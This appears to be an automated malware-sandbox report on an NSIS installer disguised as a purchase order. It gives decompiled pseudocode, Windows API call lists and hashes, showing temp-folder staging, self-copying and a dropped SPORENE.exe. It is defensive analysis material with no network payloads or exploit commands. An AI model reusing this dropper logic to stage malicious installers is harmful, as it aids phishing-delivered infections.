                											_t218 = E00405E39(L"\"C:\\Users\\engineer\\Desktop\\Purchase Order PO20211027STK.exe\" ", _t188);
                											if(_t218 < L"\"C:\\Users\\engineer\\Desktop\\Purchase Order PO20211027STK.exe\" ") {
                												L48:
                												_t263 = _t218 - L"\"C:\\Users\\engineer\\Desktop\\Purchase Order PO20211027STK.exe\" ";
                												_v8 = L"Error launching installer";
                												if(_t218 < L"\"C:\\Users\\engineer\\Desktop\\Purchase Order PO20211027STK.exe\" ") {
                													_t189 = E00405B08(__eflags);
                													lstrcatW(_t234, L"~nsu");
                													__eflags = _t189;
                													if(_t189 != 0) {
                														lstrcatW(_t234, "A");
                													}
                													lstrcatW(_t234, L".tmp");
                													_t219 = L"C:\\Users\\engineer\\Desktop";
                													_t137 = lstrcmpiW(_t234, L"C:\\Users\\engineer\\Desktop");
                													__eflags = _t137;
                													if(_t137 == 0) {
                														L67:
                														_t188 = 0;
                														__eflags = 0;
                														goto L68;
                													} else {
                														__eflags = _t189;
                														_push(_t234);
                														if(_t189 == 0) {
                															E00405AEB();
                														} else {
                															E00405A6E();
                														}
                														SetCurrentDirectoryW(_t234);
                														__eflags = L"C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
                														if(__eflags == 0) {
                															E0040653D(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t219);
                														}
                														E0040653D(0x436000, _v16);
                														_t201 = "A" & 0x0000ffff;
                														_t143 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                														__eflags = _t143;
                														_v12 = 0x1a;
                														 *0x436800 = _t143;
                														do {
                															E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                															DeleteFileW(0x42aa28);
                															__eflags = _v8;
                															if(_v8 != 0) {
                																_t148 = CopyFileW(0x443800, 0x42aa28, 1);
                																__eflags = _t148;
                																if(_t148 != 0) {
                																	E004062FD(_t201, 0x42aa28, 0);
                																	E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                																	_t152 = E00405B20(0x42aa28);
                																	__eflags = _t152;
                																	if(_t152 != 0) {
                																		CloseHandle(_t152);
                																		_v8 = 0;
                																	}
                																}
                															}
                															 *0x436800 =  *0x436800 + 1;
                															_t61 =  &_v12;
                															 *_t61 = _v12 - 1;
                															__eflags =  *_t61;
                														} while ( *_t61 != 0);
                														E004062FD(_t201, _t234, 0);
                														goto L67;
                													}
                												}
                												 *_t218 = _t188;
                												_t221 =  &(_t218[2]);
                												_t157 = E00405F14(_t263,  &(_t218[2]));
                												_t264 = _t157;
                												if(_t157 == 0) {
                													goto L68;
                												}
                												E0040653D(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t221);
                												E0040653D(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t221);
                												_v8 = _t188;
                												goto L51;
                											}
                											asm("cdq");
                											asm("cdq");
                											asm("cdq");
                											_t204 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                											_t167 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                											while( *_t218 != _t204 || _t218[1] != _t167) {
                												_t218 = _t218;
                												if(_t218 >= L"\"C:\\Users\\engineer\\Desktop\\Purchase Order PO20211027STK.exe\" ") {
                													continue;
                												}
                												break;
                											}
                											_t188 = 0;
                											goto L48;
                										}
                										GetWindowsDirectoryW(_t234, 0x3fb);
                										lstrcatW(_t234, L"\\Temp");
                										_t170 = E004034FC(_t198, _t252);
                										_t253 = _t170;
                										if(_t170 != 0) {
                											goto L40;
                										}
                										GetTempPathW(0x3fc, _t234);
                										lstrcatW(_t234, L"Low");
                										SetEnvironmentVariableW(L"TEMP", _t234);
                										SetEnvironmentVariableW(L"TMP", _t234);
                										_t175 = E004034FC(_t198, _t253);
                										_t254 = _t175;
                										if(_t175 == 0) {
                											goto L68;
                										}
                										goto L40;
                									}
                									goto L31;
                								}
                								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                									goto L29;
                								}
                								_t177 =  *((intOrPtr*)(_t198 + 8));
                								__eflags = _t177 - 0x20;
                								if(_t177 == 0x20) {
                									L28:
                									_t36 =  &_v20;
                									 *_t36 = _v20 | 0x00000004;
                									__eflags =  *_t36;
                									goto L29;
                								}
                								__eflags = _t177 - _t188;
                								if(_t177 != _t188) {
                									goto L29;
                								}
                								goto L28;
                							}
                							_t178 =  *((intOrPtr*)(_t198 + 2));
                							__eflags = _t178 - _t209;
                							if(_t178 == _t209) {
                								L23:
                								 *0x434fa0 = 1;
                								goto L24;
                							}
                							__eflags = _t178 - _t188;
                							if(_t178 != _t188) {
                								goto L24;
                							}
                							goto L23;
                						}
                					} else {
                						goto L16;
                					}
                					do {
                						L16:
                						_t198 = _t198 + 2;
                						__eflags =  *_t198 - _t209;
                					} while ( *_t198 == _t209);
                					goto L17;
                				}
                				goto L37;
                			}



















































                0x0040353b
                0x0040353c
                0x00403543
                0x00403546
                0x0040354d
                0x00403550
                0x00403563
                0x00403569
                0x0040356c
                0x0040356f
                0x0040357d
                0x00403585
                0x00403590
                0x004035a9
                0x004035ab
                0x004035b3
                0x004035b3
                0x004035be
                0x004035c0
                0x004035c0
                0x004035d5
                0x004035fa
                0x00403608
                0x0040360b
                0x00403612
                0x00403619
                0x00403619
                0x00403612
                0x0040361b
                0x00403620
                0x00403621
                0x0040362d
                0x00403631
                0x00403638
                0x00403646
                0x0040364b
                0x00403652
                0x00403656
                0x0040365a
                0x0040365c
                0x0040365c
                0x0040365a
                0x00403663
                0x0040366a
                0x00403670
                0x00403688
                0x00403698
                0x0040369d
                0x004036a3
                0x004036aa
                0x004036b1
                0x004036b3
                0x004036b4
                0x004036be
                0x004036c5
                0x004036c7
                0x004036c9
                0x004036c9
                0x004036dc
                0x004036de
                0x004037d8
                0x004037d8
                0x004037db
                0x004037de
                0x00000000
                0x00000000
                0x004036e8
                0x004036e9
                0x004036ec
                0x004036f5
                0x004036f5
                0x004036f8
                0x004036fb
                0x004036fe
                0x00403701
                0x00403701
                0x00403701
                0x00403702
                0x00403706
                0x004037c6
                0x004037cf
                0x004037d1
                0x004037d4
                0x004037d7
                0x004037d7
                0x004037d7
                0x00000000
                0x0040370c
                0x0040370d
                0x0040370e
                0x00403712
                0x0040372c
                0x00403733
                0x00403746
                0x00403747
                0x0040375c
                0x00403761
                0x00403763
                0x00403765
                0x00403781
                0x00403788
                0x0040379b
                0x0040379c
                0x004037b1
                0x004037b7
                0x004037b9
                0x004037bb
                0x004037c3
                0x004037c5
                0x00000000
                0x004037c5
                0x004037bf
                0x004037c1
                0x004037e6
                0x004037ea
                0x004037f3
                0x004037f8
                0x004037fe
                0x00403809
                0x0040380b
                0x00403810
                0x00403812
                0x0040386a
                0x0040386f
                0x00403878
                0x0040387f
                0x00403882
                0x00403a59
                0x00403a59
                0x00403a5e
                0x00403a67
                0x00403a84
                0x00403afc
                0x00403afc
                0x00403b04
                0x00403b06
                0x00403b06
                0x00403b0c
                0x00403b0c
                0x00403a9b
                0x00403aa7
                0x00403ab8
                0x00403abf
                0x00403ac6
                0x00403ac6
                0x00403ace
                0x00403ada
                0x00403ae8
                0x00403af3
                0x00000000
                0x00000000
                0x00000000
                0x00403adc
                0x00403adc
                0x00403add
                0x00403adf
                0x00403ae0
                0x00403ae1
                0x00403ae6
                0x00403af5
                0x00403af7
                0x00000000
                0x00403af7
                0x00000000
                0x00403ae6
                0x00403ada
                0x00403a71
                0x00403a78
                0x00403a78
                0x0040388e
                0x00403935
                0x00403935
                0x00403941
                0x00000000
                0x00403941
                0x0040389f
                0x004038a7
                0x004038f9
                0x004038f9
                0x004038ff
                0x00403906
                0x00403954
                0x00403956
                0x0040395b
                0x0040395d
                0x00403965
                0x00403965
                0x00403970
                0x00403975
                0x0040397c
                0x00403982
                0x00403984
                0x00403a57
                0x00403a57
                0x00403a57
                0x00000000
                0x0040398a
                0x0040398a
                0x0040398c
                0x0040398d
                0x00403996
                0x0040398f
                0x0040398f
                0x0040398f
                0x0040399c
                0x004039a4
                0x004039ab
                0x004039b3
                0x004039b3
                0x004039c0
                0x004039cc
                0x004039d6
                0x004039d6
                0x004039d8
                0x004039df
                0x004039e9
                0x004039f5
                0x004039fb
                0x00403a01
                0x00403a04
                0x00403a0e
                0x00403a14
                0x00403a16
                0x00403a1a
                0x00403a2b
                0x00403a31
                0x00403a36
                0x00403a38
                0x00403a3b
                0x00403a41
                0x00403a41
                0x00403a38
                0x00403a16
                0x00403a44
                0x00403a4b
                0x00403a4b
                0x00403a4b
                0x00403a4b
                0x00403a52
                0x00000000
                0x00403a52
                0x00403984
                0x00403908
                0x0040390b
                0x0040390f
                0x00403914
                0x00403916
                0x00000000
                0x00000000
                0x00403922
                0x0040392d
                0x00403932
                0x00000000
                0x00403932
                0x004038b0
                0x004038c8
                0x004038d9
                0x004038da
                0x004038de
                0x004038e0
                0x004038ee
                0x004038f5
                0x00000000
                0x00000000
                0x00000000
                0x004038f5
                0x004038f7
                0x00000000
                0x004038f7
                0x0040381a
                0x00403826
                0x0040382b
                0x00403830
                0x00403832
                0x00000000
                0x00000000
                0x0040383a
                0x00403842
                0x00403853
                0x0040385b
                0x0040385d
                0x00403862
                0x00403864
                0x00000000
                0x00000000
                0x00000000
                0x00403864
                0x00000000
                0x004037c1
                0x0040376a
                0x0040376c
                0x00000000
                0x00000000
                0x0040376e
                0x00403772
                0x00403776
                0x0040377d
                0x0040377d
                0x0040377d
                0x0040377d
                0x00000000
                0x0040377d
                0x00403778
                0x0040377b
                0x00000000
                0x00000000
                0x00000000
                0x0040377b
                0x00403714
                0x00403718
                0x0040371b
                0x00403722
                0x00403722
                0x00000000
                0x00403722
                0x0040371d
                0x00403720
                0x00000000
                0x00000000
                0x00000000
                0x00403720
                0x00000000
                0x00000000
                0x00000000
                0x004036ee
                0x004036ee
                0x004036ef
                0x004036f0
                0x004036f0
                0x00000000
                0x004036ee
                0x00000000

                APIs
                • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                • GetVersionExW.KERNEL32(?), ref: 00403579
                • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                • OleInitialize.OLE32(00000000), ref: 0040366A
                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" ,00000020,"C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" ,00000000), ref: 004036D6
                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                  • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" ,00000000,?), ref: 0040397C
                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                • CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                • ExitProcess.KERNEL32(?), ref: 00403A59
                • OleUninitialize.OLE32(?), ref: 00403A5E
                • ExitProcess.KERNEL32 ref: 00403A78
                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                • ExitProcess.KERNEL32 ref: 00403B0C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                • String ID: "C:\Users\user\Desktop\Purchase Order PO20211027STK.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                • API String ID: 2292928366-2592734327
                • Opcode ID: 8d24a3590c3fa0910ef95ef3363b7165c5538ed9a562f2e07edb708d24b89e61
                • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                • Opcode Fuzzy Hash: 8d24a3590c3fa0910ef95ef3363b7165c5538ed9a562f2e07edb708d24b89e61
                • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00406873(WCHAR* _a4) {
                				void* _t2;
                
                				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                				if(_t2 == 0xffffffff) {
                					return 0;
                				}
                				FindClose(_t2);
                				return 0x4302b8;
                			}




                0x0040687e
                0x00406887
                0x00000000
                0x00406894
                0x0040688a
                0x00000000

                APIs
                • FindFirstFileW.KERNELBASE(747DFAA0,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,747DFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,747DFAA0,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                • FindClose.KERNEL32(00000000), ref: 0040688A
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID:
                • API String ID: 2295610775-0
                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E00403BEC(void* __eflags) {
                				intOrPtr _v4;
                				intOrPtr _v8;
                				int _v12;
                				void _v16;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t22;
                				void* _t30;
                				void* _t32;
                				int _t33;
                				void* _t36;
                				int _t39;
                				int _t40;
                				int _t44;
                				short _t63;
                				WCHAR* _t65;
                				signed char _t69;
                				signed short _t73;
                				WCHAR* _t76;
                				intOrPtr _t82;
                				WCHAR* _t87;
                
                				_t82 =  *0x434f10;
                				_t22 = E0040690A(2);
                				_t90 = _t22;
                				if(_t22 == 0) {
                					_t76 = 0x42d268;
                					L"1033" = 0x30;
                					 *0x442002 = 0x78;
                					 *0x442004 = 0;
                					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                					__eflags =  *0x42d268;
                					if(__eflags == 0) {
                						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                					}
                					lstrcatW(L"1033", _t76);
                				} else {
                					_t73 =  *_t22(); // executed
                					E00406484(L"1033", _t73 & 0x0000ffff);
                				}
                				E00403EC2(_t78, _t90);
                				_t86 = L"C:\\Users\\engineer\\AppData\\Local\\Temp";
                				 *0x434f80 =  *0x434f18 & 0x00000020;
                				 *0x434f9c = 0x10000;
                				if(E00405F14(_t90, L"C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
                					L16:
                					if(E00405F14(_t98, _t86) == 0) {
                						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                					}
                					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                					 *0x433ee8 = _t30;
                					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                						L21:
                						if(E0040140B(0) == 0) {
                							_t32 = E00403EC2(_t78, __eflags);
                							__eflags =  *0x434fa0;
                							if( *0x434fa0 != 0) {
                								_t33 = E00405672(_t32, 0);
                								__eflags = _t33;
                								if(_t33 == 0) {
                									E0040140B(1);
                									goto L33;
                								}
                								__eflags =  *0x433ecc;
                								if( *0x433ecc == 0) {
                									E0040140B(2);
                								}
                								goto L22;
                							}
                							ShowWindow( *0x42d248, 5);
                							_t39 = E0040689A("RichEd20");
                							__eflags = _t39;
                							if(_t39 == 0) {
                								E0040689A("RichEd32");
                							}
                							_t87 = L"RichEdit20W";
                							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                							__eflags = _t40;
                							if(_t40 == 0) {
                								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                								 *0x433ec4 = _t87;
                								RegisterClassW(0x433ea0);
                							}
                							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0);
                							E00403B3C(E0040140B(5), 1);
                							return _t44;
                						}
                						L22:
                						_t36 = 2;
                						return _t36;
                					} else {
                						_t78 =  *0x434f00;
                						 *0x433ea4 = E00401000;
                						 *0x433eb0 =  *0x434f00;
                						 *0x433eb4 = _t30;
                						 *0x433ec4 = 0x40a380;
                						if(RegisterClassW(0x433ea0) == 0) {
                							L33:
                							__eflags = 0;
                							return 0;
                						}
                						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                						goto L21;
                					}
                				} else {
                					_t78 =  *(_t82 + 0x48);
                					_t92 = _t78;
                					if(_t78 == 0) {
                						goto L16;
                					}
                					_t76 = 0x432ea0;
                					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                					_t63 =  *0x432ea0; // 0x43
                					if(_t63 == 0) {
                						goto L16;
                					}
                					if(_t63 == 0x22) {
                						_t76 = 0x432ea2;
                						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                					}
                					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                						L15:
                						E0040653D(_t86, E00405E0C(_t76));
                						goto L16;
                					} else {
                						_t69 = GetFileAttributesW(_t76);
                						if(_t69 == 0xffffffff) {
                							L14:
                							E00405E58(_t76);
                							goto L15;
                						}
                						_t98 = _t69 & 0x00000010;
                						if((_t69 & 0x00000010) != 0) {
                							goto L15;
                						}
                						goto L14;
                					}
                				}
                			}

























                0x00403bf2
                0x00403bfb
                0x00403c02
                0x00403c04
                0x00403c18
                0x00403c2a
                0x00403c33
                0x00403c3c
                0x00403c43
                0x00403c48
                0x00403c4f
                0x00403c62
                0x00403c62
                0x00403c6d
                0x00403c06
                0x00403c06
                0x00403c11
                0x00403c11
                0x00403c72
                0x00403c7c
                0x00403c85
                0x00403c8a
                0x00403c9b
                0x00403d2d
                0x00403d35
                0x00403d3e
                0x00403d3e
                0x00403d54
                0x00403d5a
                0x00403d68
                0x00403de9
                0x00403df1
                0x00403dfb
                0x00403e00
                0x00403e06
                0x00403e90
                0x00403e95
                0x00403e97
                0x00403eb3
                0x00000000
                0x00403eb3
                0x00403e99
                0x00403e9f
                0x00403ea7
                0x00403ea7
                0x00000000
                0x00403e9f
                0x00403e14
                0x00403e1f
                0x00403e24
                0x00403e26
                0x00403e2d
                0x00403e2d
                0x00403e38
                0x00403e40
                0x00403e42
                0x00403e44
                0x00403e4d
                0x00403e50
                0x00403e56
                0x00403e56
                0x00403e75
                0x00403e86
                0x00000000
                0x00403e8b
                0x00403df3
                0x00403df5
                0x00000000
                0x00403d6a
                0x00403d6a
                0x00403d76
                0x00403d80
                0x00403d86
                0x00403d8b
                0x00403d9a
                0x00403eb8
                0x00403eb8
                0x00000000
                0x00403eb8
                0x00403da9
                0x00403de4
                0x00000000
                0x00403de4
                0x00403ca1
                0x00403ca1
                0x00403ca4
                0x00403ca6
                0x00000000
                0x00000000
                0x00403cb4
                0x00403cc6
                0x00403ccb
                0x00403cd4
                0x00000000
                0x00000000
                0x00403cda
                0x00403cdc
                0x00403ce9
                0x00403ce9
                0x00403cf2
                0x00403cf8
                0x00403d20
                0x00403d28
                0x00000000
                0x00403d0a
                0x00403d0b
                0x00403d14
                0x00403d1a
                0x00403d1b
                0x00000000
                0x00403d1b
                0x00403d16
                0x00403d18
                0x00000000
                0x00000000
                0x00000000
                0x00403d18
                0x00403cf8

                APIs
                  • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                  • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                • GetUserDefaultUILanguage.KERNELBASE(00000002,747DFAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403C06
                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,?,?,?,C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,747DFAA0), ref: 00403CED
                • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\SPORENE.exe,?,?,?,C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,?,00000000,?), ref: 00403D0B
                • LoadImageW.USER32 ref: 00403D54
                • RegisterClassW.USER32 ref: 00403D91
                • SystemParametersInfoW.USER32 ref: 00403DA9
                • CreateWindowExW.USER32 ref: 00403DDE
                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                • GetClassInfoW.USER32 ref: 00403E40
                • GetClassInfoW.USER32 ref: 00403E4D
                • RegisterClassW.USER32 ref: 00403E56
                • DialogBoxParamW.USER32 ref: 00403E75
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\SPORENE.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                • API String ID: 606308-3371946353
                • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E0040307D(void* __eflags, signed int _a4) {
                				DWORD* _v8;
                				DWORD* _v12;
                				void* _v16;
                				intOrPtr _v20;
                				char _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				signed int _v44;
                				long _t50;
                				void* _t53;
                				void* _t57;
                				intOrPtr* _t59;
                				long _t60;
                				long _t70;
                				signed int _t77;
                				intOrPtr _t80;
                				long _t82;
                				void* _t85;
                				signed int _t87;
                				void* _t89;
                				long _t90;
                				long _t93;
                				void* _t94;
                
                				_t82 = 0;
                				_v12 = 0;
                				_v8 = 0;
                				 *0x434f0c = GetTickCount() + 0x3e8;
                				GetModuleFileNameW(0, 0x443800, 0x400);
                				_t89 = E0040602D(0x443800, 0x80000000, 3);
                				_v16 = _t89;
                				 *0x40a018 = _t89;
                				if(_t89 == 0xffffffff) {
                					return L"Error launching installer";
                				}
                				_t92 = L"C:\\Users\\engineer\\Desktop";
                				E0040653D(L"C:\\Users\\engineer\\Desktop", 0x443800);
                				E0040653D(0x444000, E00405E58(_t92));
                				_t50 = GetFileSize(_t89, 0);
                				 *0x42aa24 = _t50;
                				_t93 = _t50;
                				if(_t50 <= 0) {
                					L24:
                					E00403019(1);
                					if( *0x434f14 == _t82) {
                						goto L29;
                					}
